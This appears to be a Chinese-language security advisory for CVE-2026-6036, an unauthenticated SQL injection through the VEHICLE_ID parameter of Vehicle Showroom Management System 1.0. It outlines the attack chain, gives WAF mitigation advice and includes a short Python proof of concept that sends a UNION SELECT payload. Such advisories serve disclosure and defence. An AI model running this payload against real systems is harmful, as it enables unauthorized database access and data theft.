CVE-2026-6036 CVSS 7.3 高危

CVE-2026-6036: Vehicle Showroom SQL注入漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6036

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vehicle Showroom Management System

漏洞概述

CVE-2026-6036是code-projects Vehicle Showroom Management System 1.0中发现的一个高危漏洞。该漏洞存在于/util/VehicleDetailsFunction.php文件中，由于未对VEHICLE_ID参数进行充分过滤，导致攻击者可以构造恶意SQL语句进行注入。由于漏洞无需身份认证且可通过网络远程利用，攻击者可借此窃取数据库敏感信息、篡改数据或破坏系统可用性，风险极高。

技术细节

该漏洞属于典型的SQL注入漏洞，根源在于后端PHP代码在处理用户输入时缺乏有效的安全校验。具体而言，在/util/VehicleDetailsFunction.php文件中，系统直接接收HTTP请求中的VEHICLE_ID参数，并将其拼接到SQL查询语句中执行，未使用预处理语句（Prepared Statements）或输入过滤机制。攻击者可以通过在VEHICLE_ID参数中注入单引号等SQL元字符，闭合原始查询结构，进而拼接恶意的UNION SELECT查询、基于布尔或时间的盲注语句。由于CVSS向量显示PR:N（无需权限）和UI:N（无需交互），攻击者只需发送特制的HTTP GET或POST请求即可触发漏洞。成功利用后，攻击者可绕过前端验证，直接与后端数据库交互，读取管理员密码哈希、用户信息等敏感数据，甚至在特定数据库权限下执行写入操作，导致服务器被完全控制。

攻击链分析

STEP 1

信息收集

攻击者识别并锁定运行Vehicle Showroom Management System 1.0的目标服务器。

STEP 2

漏洞探测

访问/util/VehicleDetailsFunction.php文件，测试VEHICLE_ID参数是否存在SQL注入点。

STEP 3

构造攻击载荷

利用SQL注入语法构造恶意Payload（如UNION SELECT语句），试图绕过输入验证。

STEP 4

执行注入与数据窃取

发送包含Payload的HTTP请求，服务器执行恶意SQL语句，返回敏感数据库信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target.com/util/VehicleDetailsFunction.php"
# Payload to extract database version using UNION based SQL injection
payload = "1 UNION SELECT 1, version(), 3, 4, 5, 6-- -"

params = {
    "VEHICLE_ID": payload
}

try:
    # Sending the malicious request
    response = requests.get(target_url, params=params)
    if response.status_code == 200:
        print("[+] Exploit successful! Check response for DB version.")
        print(response.text)
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Vehicle Showroom Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员在Web应用防火墙（WAF）上部署规则，拦截针对/util/VehicleDetailsFunction.php文件的异常请求，特别是包含单引号、UNION、SELECT等SQL关键词的参数。同时，应限制对数据库的直接访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6036
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6036
3 Details https://www.cvedetails.com/cve/CVE-2026-6036/
4 VulDB https://vuldb.com/cve/CVE-2026-6036
5 Link https://code-projects.org/
6 Link https://github.com/TAnNbR/CVE/issues/3
7 Link https://vuldb.com/submit/796201
8 Link https://vuldb.com/vuln/356617
9 Link https://vuldb.com/vuln/356617/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表